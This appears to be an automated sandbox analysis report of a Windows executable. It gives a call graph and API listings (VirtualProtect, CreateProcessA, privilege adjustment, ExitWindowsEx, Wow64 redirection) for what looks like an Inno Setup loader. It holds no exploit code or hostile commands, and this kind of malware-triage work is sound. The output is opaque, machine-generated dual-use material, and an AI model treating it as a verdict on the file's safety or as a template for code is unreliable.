calls 5570->5571 5573 40789c 5571->5573 5572->5570 5574 407360 23 API calls 5573->5574 5575 4078bd 5574->5575 5576 40764c InterlockedExchange 5575->5576 5577 4078d2 5576->5577 5578 4078e8 5577->5578 5579 4057d8 4 API calls 5577->5579 5578->5493 5579->5578 5581 40760a 5580->5581 5582 40761b 5580->5582 5583 40760f InterlockedExchange 5581->5583 5582->5180 5582->5311 5583->5582 6297 402af2 6298 402afe 6297->6298 6301 402ed0 6298->6301 6302 403154 4 API calls 6301->6302 6304 402ee0 6302->6304 6303 402b03 6304->6303 6306 402b0c 6304->6306 6307 402b25 6306->6307 6308 402b15 RaiseException 6306->6308 6307->6303 6308->6307 6648 402dfa 6649 402e0d 6648->6649 6651 402e26 6648->6651 6652 402ba4 6649->6652 6653 402bc9 6652->6653 6654 402bad 6652->6654 6653->6651 6655 402bb5 RaiseException 6654->6655 6655->6653 6030 4073fc WriteFile 6031 407423 6030->6031 6032 40741c 6030->6032 6034 407434 6031->6034 6035 40726c 20 API calls 6031->6035 6033 40730c 21 API calls 6032->6033 6033->6031 6035->6034 6513 403f7d 6514 403fa2 6513->6514 6515 403f84 6513->6515 6514->6515 6517 403e8e 4 API calls 6514->6517 6516 403f8c 6515->6516 6518 402674 4 API calls 6515->6518 6517->6515 6519 403fca 6518->6519 6313 406efe 6314 406ee8 6313->6314 6315 403198 4 API calls 6314->6315 6316 406ef0 6315->6316 6317 403198 4 API calls 6316->6317 6318 406ef8 6317->6318 6319 403a80 CloseHandle 6320 403a90 6319->6320 6321 403a91 GetLastError 6319->6321 6520 403d02 6525 403d12 6520->6525 6521 403ddf ExitProcess 6522 403db8 6523 403cc8 4 API calls 6522->6523 6524 403dc2 6523->6524 6527 403cc8 4 API calls 6524->6527 6525->6521 6525->6522 6526 403dea 6525->6526 6530 403da4 6525->6530 6531 403d8f MessageBoxA 6525->6531 6528 403dcc 6527->6528 6540 4019dc 6528->6540 6536 403fe4 6530->6536 6531->6522 6532 403dd1 6532->6521 6532->6526 6537 403fe8 6536->6537 6538 403f07 4 API calls 6537->6538 6539 404006 6538->6539 6541 401abb 6540->6541 6542 4019ed 6540->6542 6541->6532 6543 401a04 RtlEnterCriticalSection 6542->6543 6544 401a0e LocalFree 6542->6544 6543->6544 6545 401a41 6544->6545 6546 401a2f VirtualFree 6545->6546 6547 401a49 6545->6547 6546->6545 6548 401a70 LocalFree 6547->6548 6549 401a87 6547->6549 6548->6548 6548->6549 6550 401aa9 RtlDeleteCriticalSection 6549->6550 6551 401a9f RtlLeaveCriticalSection 6549->6551 6550->6532 6551->6550 6322 404283 6323 4042c3 6322->6323 6324 403154 4 API calls 6323->6324 6325 404323 6324->6325 6656 404185 6657 4041ff 6656->6657 6658 4041cc 6657->6658 6659 403154 4 API calls 6657->6659 6660 404323 6659->6660 5584 407186 5585 407194 CloseHandle 5584->5585 5586 40719d 5584->5586 5585->5586 6135 404206 6136 4041cc 6135->6136 6139 40420a 6135->6139 6137 404282 6138 403154 4 API calls 6140 404323 6138->6140 6139->6137 6139->6138 6330 409c86 6331 409cb6 6330->6331 6332 409cc0 CreateWindowExA SetWindowLongA 6331->6332 6333 4050dc 19 API calls 6332->6333 6334 409d22 6333->6334 6335 4032fc 4 API calls 6334->6335 6336 409d30 6335->6336 6337 4050dc 19 API calls 6336->6337 6338 409d68 6337->6338 6339 4032fc 4 API calls 6338->6339 6340 409d71 6339->6340 6341 406884 GetCommandLineA 6340->6341 6342 409d7d 6341->6342 6343 4032fc 4 API calls 6342->6343 6344 409d86 6343->6344 6345 409538 29 API calls 6344->6345 6346 409d98 6345->6346 6347 409dd1 6346->6347 6348 409120 9 API calls 6346->6348 6349 409dea 6347->6349 6353 409de4 RemoveDirectoryA 6347->6353 6348->6347 6350 409df3 73A25CF0 6349->6350 6351 409dfe 6349->6351 6350->6351 6352 409e26 6351->6352 6354 40357c 4 API calls 6351->6354 6353->6349 6355 409e1c 6354->6355 6356 4025ac 4 API calls 6355->6356 6356->6352 6357 403e87 6358 403e4c 6357->6358 6359 403e67 6358->6359 6360 403e62 6358->6360 6361 403e7b 6358->6361 6364 403e78 6359->6364 6370 402674 6359->6370 6366 403cc8 6360->6366 6362 402674 4 API calls 6361->6362 6362->6364 6368 403cd6 6366->6368 6367 403ceb 6367->6359 6368->6367 6369 402674 4 API calls 6368->6369 6369->6367 6371 403154 4 API calls 6370->6371 6372 40267a 6371->6372 6372->6364 6141 402c08 6142 402c19 6141->6142 6145 402c82 6141->6145 6143 402c56 RtlUnwind 6142->6143 6142->6145 6148 402b28 6142->6148 6144 403154 4 API calls 6143->6144 6144->6145 6149 402b31 RaiseException 6148->6149 6150 402b47 6148->6150 6149->6150 6150->6143 6556 40950b 6557 402f24 5 API calls 6556->6557 6558 409510 6557->6558 6373 403e95 6374 403e4c 6373->6374 6375 403e67 6374->6375 6376 403e62 6374->6376 6377 403e7b 6374->6377 6380 403e78 6375->6380 6381 402674 4 API calls 6375->6381 6379 403cc8 4 API calls 6376->6379 6378 402674 4 API calls 6377->6378 6378->6380 6379->6375 6381->6380 6386 403a97 6387 403aac 6386->6387 6388 403bbc GetStdHandle 6387->6388 6389 403b0e CreateFileA 6387->6389 6398 403ab2 6387->6398 6390 403c17 GetLastError 6388->6390 6403 403bba 6388->6403 6389->6390 6391 403b2c 6389->6391 6390->6398 6393 403b3b GetFileSize 6391->6393 6391->6403 6393->6390 6394 403b4e SetFilePointer 6393->6394 6394->6390 6399 403b6a ReadFile 6394->6399 6395 403be7 GetFileType 6397 403c02 CloseHandle 6395->6397 6395->6398 6397->6398 6399->6390 6400 403b8c 6399->6400 6401 403b9f SetFilePointer 6400->6401 6400->6403 6401->6390 6402 403bb0 SetEndOfFile 6401->6402 6402->6390 6402->6403 6403->6395 6403->6398 6155 403018 6156 403070 6155->6156 6157 403025 6155->6157 6158 40302a RtlUnwind 6157->6158 6159 40304e 6158->6159 6161 402f78 6159->6161 6162 402be8 6159->6162 6163 402bf1 RaiseException 6162->6163 6164 402c04 6162->6164 6163->6164 6164->6156 5589 409c99 SetLastError 5620 409184 GetLastError 5589->5620 5592 409cb6 5594 409cc0 CreateWindowExA SetWindowLongA 5592->5594 5595 4050dc 19 API calls 5594->5595 5596 409d22 5595->5596 5597 4032fc 4 API calls 5596->5597 5598 409d30 5597->5598 5599 4050dc 19 API calls 5598->5599 5600 409d68 5599->5600 5601 4032fc 4 API calls 5600->5601 5602 409d71 5601->5602 5603 406884 GetCommandLineA 5602->5603 5604 409d7d 5603->5604 5605 4032fc 4 API calls 5604->5605 5606 409d86 5605->5606 5633 409538 5606->5633 5608 409d98 5609 409dd1 5608->5609 5610 409db8 5608->5610 5612 409dea 5609->5612 5616 409de4 RemoveDirectoryA 5609->5616 5652 409120 5610->5652 5613 409df3 73A25CF0 5612->5613 5614 409dfe 5612->5614 5613->5614 5615 409e26 5614->5615 5660 40357c 5614->5660 5616->5612 5618 409e1c 5619 4025ac 4 API calls 5618->5619 5619->5615 5673 404bdc 5620->5673 5623 407054 5 API calls 5624 4091db 5623->5624 5676 4089cc 5624->5676 5627 4057d8 4 API calls 5628 4091ff 5627->5628 5629 4031b8 4 API calls 5628->5629 5630 40921e 5629->5630 5631 403198 4 API calls 5630->5631 5632 409226 5631->5632 5632->5592 5647 402f24 5632->5647 5634 4033b4 4 API calls 5633->5634 5635 409577 5634->5635 5636 4095a9 CreateProcessA 5635->5636 5637 4095b5 5636->5637 5638 4095bc CloseHandle 5636->5638 5639 409184 21 API calls 5637->5639 5640 4095d3 PeekMessageA 5638->5640 5639->5638 5641 4095e5 MsgWaitForMultipleObjects 5640->5641 5642 4095c7 TranslateMessage DispatchMessageA 5640->5642 5641->5640 5643 4095fc GetExitCodeProcess CloseHandle 5641->5643 5642->5640 5644 40961f 5643->5644 5645 403198 4 API calls 5644->5645 5646 409627 5645->5646 5646->5608 5648 403154 4 API calls 5647->5648 5649 402f29 5648->5649 5690 402bcc 5649->5690 5651 402f51 5651->5651 5653 40917a 5652->5653 5655 409133 5652->5655 5653->5609 5654 40913b Sleep 5654->5655 5655->5653 5655->5654 5656 40914b Sleep 5655->5656 5658 409162 GetLastError 5655->5658 5693 408bdc 5655->5693 5656->5655 5658->5653 5659 40916c GetLastError 5658->5659 5659->5653 5659->5655 5661 403591 5660->5661 5662 4035a0 5660->5662 5665 4035d0 5661->5665 5666 40359b 5661->5666 5670 4035b6 5661->5670 5663 4035b1 5662->5663 5664 4035b8 5662->5664 5667 403198 4 API calls 5663->5667 5668 4031b8 4 API calls 5664->5668 5665->5670 5671 40357c 4 API calls 5665->5671 5666->5662 5669 4035ec 5666->5669 5667->5670 5668->5670 5669->5670 5710 403554 5669->5710 5670->5618 5671->5665 5674 4050f0 19 API calls 5673->5674 5675 404bfa 5674->5675 5675->5623 5677 4089ec 5676->5677 5680 4088cc 5677->5680 5681 403198 4 API calls 5680->5681 5682 4088fd 5680->5682 5681->5682 5684 408914 5682->5684 5686 403278 4 API calls 5682->5686 5688 4032fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5682->5688 5689 408928 5682->5689 5683 4031b8 4 API calls 5685 4089ad 5683->5685 5687 4032fc 4 API calls 5684->5687 5685->5627 5686->5682 5687->5689 5688->5682 5689->5683 5691 402bd5 RaiseException 5690->5691 5692 402be6 5690->5692 5691->5692 5692->5651 5701 408b90 5693->5701 5695 408bf2 5696 408bf6 5695->5696 5697 408c12 DeleteFileA GetLastError 5695->5697 5696->5655 5698 408c30 5697->5698 5707 408bcc 5698->5707 5702 408b9a 5701->5702 5703 408b9e 5701->5703 5702->5695 5704 408bc0 SetLastError 5703->5704 5705 408ba7 Wow64DisableWow64FsRedirection 5703->5705 5706 408bbb 5704->5706 5705->5706 5706->5695 5708 408bd1 Wow64RevertWow64FsRedirection 5707->5708 5709 408bdb 5707->5709 5708->5709 5709->5655 5711 403566 5710->5711 5713 403578 5711->5713 5714 403604 5711->5714 5713->5669 5715 40357c 5714->5715 5716 4035a0 5715->5716 5717 4035b6 5715->5717 5720 4035d0 5715->5720 5721 40359b 5715->5721 5718 4035b1 5716->5718 5719 4035b8 5716->5719 5717->5711 5722 403198 4 API calls 5718->5722 5723 4031b8 4 API calls 5719->5723 5720->5717 5725 40357c 4 API calls 5720->5725 5721->5716 5724 4035ec 5721->5724 5722->5717 5723->5717 5724->5717 5726 403554 4 API calls 5724->5726 5725->5720 5726->5724 6165 40781c 6166 40782d 6165->6166 6167 407204 23 API calls 6166->6167 6168 407851 6166->6168 6169 40783d 6167->6169 6170 4073a0 23 API calls 6169->6170 6170->6168 6171 405a1c 6172 405a24 6171->6172 6173 405a2c 6171->6173 6174 405a33 6172->6174 6175 405a2a 6172->6175 6176 405888 5 API calls 6174->6176 6178 405994 6175->6178 6176->6173 6185 40599c 6178->6185 6179 4059b6 6181 4059d2 6179->6181 6182 4059bb 6179->6182 6180 403154 4 API calls 6180->6185 6184 403154 4 API calls 6181->6184 6183 405888 5 API calls 6182->6183 6186 4059ce 6183->6186 6187 4059d7 6184->6187 6185->6179 6185->6180 6189 403154 4 API calls 6186->6189 6188 4058f8 19 API calls 6187->6188 6188->6186 6190 405a00 6189->6190 6191 403154 4 API calls 6190->6191 6192 405a0e 6191->6192 6192->6173 6414 4094a4 6415 4094ba 6414->6415 6416 4094cd 6414->6416 6417 4094c2 CallWindowProcA 6415->6417 6418 4094c4 6415->6418 6417->6416 6418->6416 6420 40937c 5 API calls 6418->6420 6420->6416 6193 403a28 ReadFile 6194 403a46 6193->6194 6195 403a49 GetLastError 6193->6195 6425 4050a8 6426 4050bb 6425->6426 6427 404da0 19 API calls 6426->6427 6428 4050cf 6427->6428 6677 4011aa 6678 4011ac GetStdHandle 6677->6678 6432 4028ac 6433 402594 4 API calls 6432->6433 6434 4028b6 6433->6434 6567 403932 6568 403924 6567->6568 6569 40374c VariantClear 6568->6569 6570 40392c 6569->6570 6206 409e33 6208 409da5 6206->6208 6207 409dd1 6210 409dea 6207->6210 6214 409de4 RemoveDirectoryA 6207->6214 6208->6207 6209 409120 9 API calls 6208->6209 6209->6207 6211 409df3 73A25CF0 6210->6211 6212 409dfe 6210->6212 6211->6212 6213 409e26 6212->6213 6215 40357c 4 API calls 6212->6215 6214->6210 6216 409e1c 6215->6216 6217 4025ac 4 API calls 6216->6217 6217->6213 6218 409e38 6219 409e41 6218->6219 6221 409e46 6218->6221 6226 409088 6219->6226 6222 403198 4 API calls 6221->6222 6223 409e91 6222->6223 6224 403198 4 API calls 6223->6224 6225 409e99 6224->6225 6227 409094 GetCurrentProcess OpenProcessToken 6226->6227 6228 4090f5 ExitWindowsEx 6226->6228 6230 4090a6 6227->6230 6231 4090ad LookupPrivilegeValueA AdjustTokenPrivileges GetLastError 6227->6231 6229 409102 6228->6229 6235 4090ab 6228->6235 6234 409068 MessageBoxA 6229->6234 6237 409068 6230->6237 6231->6228 6233 4090ee 6231->6233 6236 409068 MessageBoxA 6233->6236 6234->6235 6235->6221 6236->6235 6238 409074 6237->6238 6239 40907f MessageBoxA 6238->6239 6239->6235 6441 401ab9 6442 401a96 6441->6442 6443 401aa9 RtlDeleteCriticalSection 6442->6443 6444 401a9f RtlLeaveCriticalSection 6442->6444 6444->6443 6244 408c3e 6245 408c30 6244->6245 6246 408bcc Wow64RevertWow64FsRedirection 6245->6246 6247 408c38 6246->6247 6683 4079bf 6687 4079c5 6683->6687 6684 40322c 4 API calls 6685 407a5d 6684->6685 6686 4032fc 4 API calls 6685->6686 6688 407a67 6686->6688 6687->6684 6689 4057d8 4 API calls 6688->6689 6690 407a76 6689->6690 6691 403198 4 API calls 6690->6691 6692 407a90 6691->6692

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 104 4096e0-409704 GetSystemInfo VirtualQuery 105 409794-40979b 104->105 106 40970a 104->106 107 409789-40978e 106->107 107->105 108 40970c-409713 107->108 109 409775-409787 VirtualQuery 108->109 110 409715-409719 108->110 109->105 109->107 110->109 111 40971b-409723 110->111 112 409734-409745 VirtualProtect 111->112 113 409725-409728 111->113 115 409747 112->115 116 409749-40974b 112->116 113->112 114 40972a-40972d 113->114 114->112 117 40972f-409732 114->117 115->116 118 40975a-40975d 116->118 117->112 117->116 119 40974d-409756 call 4096d8 118->119 120 40975f-409761 118->120 119->118 120->109 122 409763-409770 VirtualProtect 120->122 122->109
                                                                                  APIs
                                                                                  • GetSystemInfo.KERNEL32(?), ref: 004096F2
                                                                                  • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 004096FD
                                                                                  • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 0040973E
                                                                                  • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409770
                                                                                  • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409780
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2984564666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2984531710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984595057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984621478.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_JtDj8LXROa.jbxd
                                                                                  Similarity
                                                                                  • API ID: Virtual$ProtectQuery$InfoSystem
                                                                                  • String ID:
                                                                                  • API String ID: 2441996862-0
                                                                                  • Opcode ID: 7f613f571b23d34f1ef5b78d27a030d0eac1f76452ab45cb953000a9348a8afa
                                                                                  • Instruction ID: 86b9d5fd1eee0081acb6762aee029ab377072c4b324bfd59bc080c5596488fd4
                                                                                  • Opcode Fuzzy Hash: 7f613f571b23d34f1ef5b78d27a030d0eac1f76452ab45cb953000a9348a8afa
                                                                                  • Instruction Fuzzy Hash: 7921AE72211304EBD7309EA98C85E57B3D89F45360F08483AF689E32D3D338EC408669
                                                                                  APIs
                                                                                  • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040B4BC,00000001,?,0040521F,?,00000000,004052FE), ref: 00405172
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2984564666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2984531710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984595057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984621478.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_JtDj8LXROa.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoLocale
                                                                                  • String ID:
                                                                                  • API String ID: 2299586839-0
                                                                                  • Opcode ID: 846dc9dc4eedfff783169b323469795001de20900b5770415cfe848b5d58c24f
                                                                                  • Instruction ID: e204790b59b9358f1e4d9a3327d2868e2a874508d89f7fdb258cef3b84625360
                                                                                  • Opcode Fuzzy Hash: 846dc9dc4eedfff783169b323469795001de20900b5770415cfe848b5d58c24f
                                                                                  • Instruction Fuzzy Hash: 2EE09271B0021427D710A9699C86AFB725CD758310F0002BFB904E73C2EDB49E8046ED

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • SetLastError.KERNEL32 ref: 00409CA5
                                                                                    • Part of subcall function 00409184: GetLastError.KERNEL32(00000000,00409227,?,?,02072EB8,?), ref: 004091A8
                                                                                  • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00409CE2
                                                                                  • SetWindowLongA.USER32(00010482,000000FC,004094A4), ref: 00409CF9
                                                                                    • Part of subcall function 00406884: GetCommandLineA.KERNEL32(?,?,004069C8,00000000,00406A04,?,?,?,?,00000000,00000000,?,004092C1,00000000,0040934D), ref: 00406888
                                                                                    • Part of subcall function 00409538: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,0040964C,02072EB8,00409640,00000000,00409628), ref: 004095AC
                                                                                    • Part of subcall function 00409538: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,0040964C,02072EB8,00409640,00000000), ref: 004095C0
                                                                                    • Part of subcall function 00409538: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 004095DC
                                                                                    • Part of subcall function 00409538: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 004095F4
                                                                                    • Part of subcall function 00409538: GetExitCodeProcess.KERNEL32(?,?), ref: 00409604
                                                                                    • Part of subcall function 00409538: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000001,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044), ref: 0040960D
                                                                                  • RemoveDirectoryA.KERNEL32(00000000,00409E38,?,?,?,?,?,?,?,?,?), ref: 00409DE5
                                                                                  • 73A25CF0.USER32(00010482,00409E38,?,?,?,?,?,?,?,?,?), ref: 00409DF9
                                                                                    • Part of subcall function 00409120: Sleep.KERNEL32(?,?,?,?,0000000D,?,00409DD1,000000FA,00000032,00409E38,?,?,?), ref: 0040913F
                                                                                    • Part of subcall function 00409120: GetLastError.KERNEL32(?,?,?,0000000D,?,00409DD1,000000FA,00000032,00409E38,?,?,?), ref: 00409162
                                                                                    • Part of subcall function 00409120: GetLastError.KERNEL32(?,?,?,0000000D,?,00409DD1,000000FA,00000032,00409E38,?,?,?), ref: 0040916C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2984564666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2984531710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984595057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984621478.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_JtDj8LXROa.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$CloseCreateHandleProcessWindow$CodeCommandDirectoryExitLineLongMessageMultipleObjectsPeekRemoveSleepWait
                                                                                  • String ID: " %d %d $/SL4 $%x "$InnoSetupLdrWindow$STATIC
                                                                                  • API String ID: 3409222764-4098424104
                                                                                  • Opcode ID: 9f3bf88fc7d9ec15e270c5dbee6223657024d2090391407ade3872d3de235382
                                                                                  • Instruction ID: a2dbae29b7fa32a23e615bf0b3c78bbc18240db606a5df6dfb9d46a113014ef4
                                                                                  • Opcode Fuzzy Hash: 9f3bf88fc7d9ec15e270c5dbee6223657024d2090391407ade3872d3de235382
                                                                                  • Instruction Fuzzy Hash: C04128706002059BDB01EBA9EE46B9E77A4EF88304F10417BF100B72E2D7799D41DBAD

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,0040964C,02072EB8,00409640,00000000,00409628), ref: 004095AC
                                                                                  • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,0040964C,02072EB8,00409640,00000000), ref: 004095C0
                                                                                  • TranslateMessage.USER32(?), ref: 004095C8
                                                                                  • DispatchMessageA.USER32(?), ref: 004095CE
                                                                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 004095DC
                                                                                  • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 004095F4
                                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00409604
                                                                                  • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000001,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044), ref: 0040960D
                                                                                    • Part of subcall function 00409184: GetLastError.KERNEL32(00000000,00409227,?,?,02072EB8,?), ref: 004091A8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2984564666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2984531710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984595057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984621478.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_JtDj8LXROa.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$CloseHandleProcess$CodeCreateDispatchErrorExitLastMultipleObjectsPeekTranslateWait
                                                                                  • String ID: D
                                                                                  • API String ID: 884379925-2746444292
                                                                                  • Opcode ID: 890e347dbad1fa18d859c97281a6d83f9d7cf972bc91767a2c7ab6b7045843af
                                                                                  • Instruction ID: 7fd6f5ca43d97b4007f0aa0c58e810b097c2bddd3e7c7b7f5e2852f9cdbc5f09
                                                                                  • Opcode Fuzzy Hash: 890e347dbad1fa18d859c97281a6d83f9d7cf972bc91767a2c7ab6b7045843af
                                                                                  • Instruction Fuzzy Hash: 0B2174B1A442087ADB11EBE6CC42F9F77ACDB48714F50003AB714F72C2DA7899018A6D

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00409CE2
                                                                                  • SetWindowLongA.USER32(00010482,000000FC,004094A4), ref: 00409CF9
                                                                                    • Part of subcall function 00406884: GetCommandLineA.KERNEL32(?,?,004069C8,00000000,00406A04,?,?,?,?,00000000,00000000,?,004092C1,00000000,0040934D), ref: 00406888
                                                                                    • Part of subcall function 00409538: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,0040964C,02072EB8,00409640,00000000,00409628), ref: 004095AC
                                                                                    • Part of subcall function 00409538: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,0040964C,02072EB8,00409640,00000000), ref: 004095C0
                                                                                    • Part of subcall function 00409538: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 004095DC
                                                                                    • Part of subcall function 00409538: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 004095F4
                                                                                    • Part of subcall function 00409538: GetExitCodeProcess.KERNEL32(?,?), ref: 00409604
                                                                                    • Part of subcall function 00409538: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000001,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044), ref: 0040960D
                                                                                  • RemoveDirectoryA.KERNEL32(00000000,00409E38,?,?,?,?,?,?,?,?,?), ref: 00409DE5
                                                                                  • 73A25CF0.USER32(00010482,00409E38,?,?,?,?,?,?,?,?,?), ref: 00409DF9
                                                                                    • Part of subcall function 00409120: Sleep.KERNEL32(?,?,?,?,0000000D,?,00409DD1,000000FA,00000032,00409E38,?,?,?), ref: 0040913F
                                                                                    • Part of subcall function 00409120: GetLastError.KERNEL32(?,?,?,0000000D,?,00409DD1,000000FA,00000032,00409E38,?,?,?), ref: 00409162
                                                                                    • Part of subcall function 00409120: GetLastError.KERNEL32(?,?,?,0000000D,?,00409DD1,000000FA,00000032,00409E38,?,?,?), ref: 0040916C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2984564666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2984531710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984595057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984621478.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_JtDj8LXROa.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseCreateErrorHandleLastProcessWindow$CodeCommandDirectoryExitLineLongMessageMultipleObjectsPeekRemoveSleepWait
                                                                                  • String ID: " %d %d $/SL4 $%x "$InnoSetupLdrWindow$STATIC
                                                                                  • API String ID: 4113000731-4098424104
                                                                                  • Opcode ID: 55bb1d7063d9a5e3a83db9c9e4c84ac3ca0163ced89baaece5227366f19b06c2
                                                                                  • Instruction ID: b2dfb3121f9b51fea656d5364fc3dd7908fa10c9019a931ded48b6d401e5d311
                                                                                  • Opcode Fuzzy Hash: 55bb1d7063d9a5e3a83db9c9e4c84ac3ca0163ced89baaece5227366f19b06c2
                                                                                  • Instruction Fuzzy Hash: D741F8716042059FD705EBA9EE46B9A77E4EF88304F10457BE100B72E2D7799D40CB9D

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00408D5D,?,?,?,?,00000000,?,0040981F), ref: 00408CE4
                                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00408CEA
                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,Wow64DisableWow64FsRedirection,00000000,00408D5D,?,?,?,?,00000000,?,0040981F), ref: 00408CFE
                                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00408D04
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2984564666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2984531710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984595057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2984621478.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_JtDj8LXROa.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProc
                                                                                  • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                  • API String ID: 1646373207-2130885113
                                                                                  • Opcode ID: 17802b6312063bb891bf2ce3ec30b0bb0d956a41ad3ce76f20529bc848dfb5e3
                                                                                  • Instruction ID: 649fc445436ace4c2450aad8083e2e4efe238f739e3d7cd5d0e2c2e79d1dc935
                                                                                  • Opcode Fuzzy Hash: 17802b6312063bb891bf2ce3ec30b0bb0d956a41ad3ce76f20529bc848dfb5e3
                                                                                  • Instruction Fuzzy Hash: 9C01B170114308AEF7107B629E06B563668EB61708F20453FF580B61C2DE7C5804866D

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • MessageBoxA.USER32(00000000,00000000,00000000,00000010), ref: 00409A43
                                                                                  • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409A87
                                                                                  Strings
                                                                                  Memory Dump Source
